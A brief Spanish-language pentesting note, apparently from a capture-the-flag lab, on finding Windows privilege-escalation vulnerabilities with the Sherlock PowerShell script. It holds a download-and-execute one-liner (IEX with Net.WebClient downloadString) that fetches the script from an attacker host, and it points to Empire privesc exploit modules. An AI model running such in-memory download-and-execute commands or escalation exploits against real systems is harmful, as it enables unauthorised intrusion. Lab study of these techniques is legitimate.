Nota, si es windows 10 puedes usar watson ja…

Lo que estoy haciendo es activar la función:

function Find-AllVulns {

    if ( !$Global:ExploitTable ) {

        $null = New-ExploitTable
    
    }

        Find-MS10015
        Find-MS10092
        Find-MS13053
        Find-MS13081
        Find-MS14058
        Find-MS15051
        Find-MS15078
        Find-MS16016
        Find-MS16032
        Find-MS16034
        Find-MS16135
        Find-CVE20177199

        Get-Results

}

Archivo: SherlockAllchecks

powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19:8000/SherlockAllchecks.ps1')

Si en Sherlock the salen MS16032.ps1 o Invoke-MS16135.ps1 los puedes llamar manualmente desde empire https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc Solo checa que el command y la función tengan el mismo nombre. https://youtu.be/kWTnVBIpNsE?t=975

Otro lugar de powershell 64 es c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe